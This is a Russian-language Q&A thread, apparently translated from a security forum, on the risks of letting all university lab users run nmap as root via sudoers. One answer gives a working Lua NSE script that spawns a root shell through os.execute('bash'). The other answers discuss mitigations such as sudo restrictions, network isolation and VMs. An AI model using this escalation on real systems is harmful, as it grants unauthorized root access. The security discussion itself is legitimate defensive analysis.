Назад | Перейти на главную страницу

Опасно ли разрешать каждому пользователю запускать nmap от имени root?

В нашем университете у нас есть несколько компьютеров в «сетевой лаборатории», которые настроены так, чтобы каждый мог запускать nmap как root через / etc / sudoers. Может ли это быть уязвимостью безопасности?

Я только что узнал, что nmap позволяет пользователю запускать произвольные сценарии lua. Вы можете получить корневую оболочку с помощью этого lua-скрипта:

description = [[]]
author = ""
license = ""
categories = {}

portrule = function(host, port)
os.execute("bash")
return false
end

action = function(host, port)

end

Есть несколько областей потенциальной уязвимости:

  1. Если пользователи могут сканировать сеть производственного типа, это может вызвать проблемы отказа в обслуживании для различных служб и систем. Однако это не определенная уязвимость запуска Nmap от имени пользователя root; такова природа инструмента. Соответственно, песочница просканированной сети, и все будет в порядке.

  2. Если в самом приложении nmap есть ошибки безопасности, то да, уязвимости могут быть. Проверьте bugtraq и списки рассылки с полным раскрытием информации. Убедитесь, что вы используете последнюю версию стабильного nmap (я не рекомендую использовать бета-версии для чего-либо серьезного), и все будет в порядке.

  3. Наконец, если кто-то смог внедрить вредоносный сценарий Lua, который может запускаться механизмом сценариев nmap (NSE), то есть вероятность, что этот сценарий будет запущен от имени пользователя root. Доступ к оболочке можно получить через NSE; видеть Ответ Ким для подробностей.

Из трех, 2-й и 3-й - это те, которые будут усилены запуском от имени root. Проблемы останутся как у обычного пользователя; уязвимости будут ограничены в той степени, в которой у обычного пользователя есть доступ.

Вы можете ограничить, какие параметры nmap можно использовать с помощью файла конфигурации sudo, чтобы попытаться смягчить № 3, не разрешив пользователям использовать NSE. Конечно, если им нужен доступ к NSE для достижения своих образовательных целей, вам, вероятно, придется пойти на риск.

Разрешение пользователям использовать компьютеры может быть уязвимость безопасности. Большинство «взломов» - это внутренние рабочие места.

В любом случае, Nmap может быть проблемой безопасности, несмотря ни на что. Молоток строит дома, пробивает дыры в черепах. Зависит от пользователя и намерений.

Скорее всего, Nmap в школе будет использоваться 99% времени так, как он предназначен для учебной среды. Я думаю, вам почти нужно предоставить ему некоторый root-доступ, так как вы играете с портами ниже 1024.

Проблема в том, что их можно использовать для «аудита» других компьютеров в вашей сети.

Если вы хотите ограничить повреждение, рассмотрите возможность а) разделить лаборатории на коммутаторе, чтобы они не могли сканировать порты других компьютеров за пределами лаборатории, или выборочно разрешите сканирование или доступ к службам за пределами лаборатории, если это лаборатории общего пользования. Б) запустите nmap на виртуализированных машинах, которые студенты могут настраивать и настраивать, но легко стираются, возможно, с помощью ssh'ing на виртуализированный сервер студентов, который дает им больше доступа. Это позволяет вам немного лучше централизовать управление, и они могут делать что-то, используя XLiveCD в Windows или в любой среде Linux на лабораторных компьютерах.

Nmap также может создать нагрузку на любую сеть. Если у вас есть лаборатория из 20 машин, одновременно сканирующих порты других машин, вы будете пропускать большой трафик через коммутаторы ... надеюсь, у них есть мощность, чтобы справиться с этим, или вы увидите какие-то странные вещи.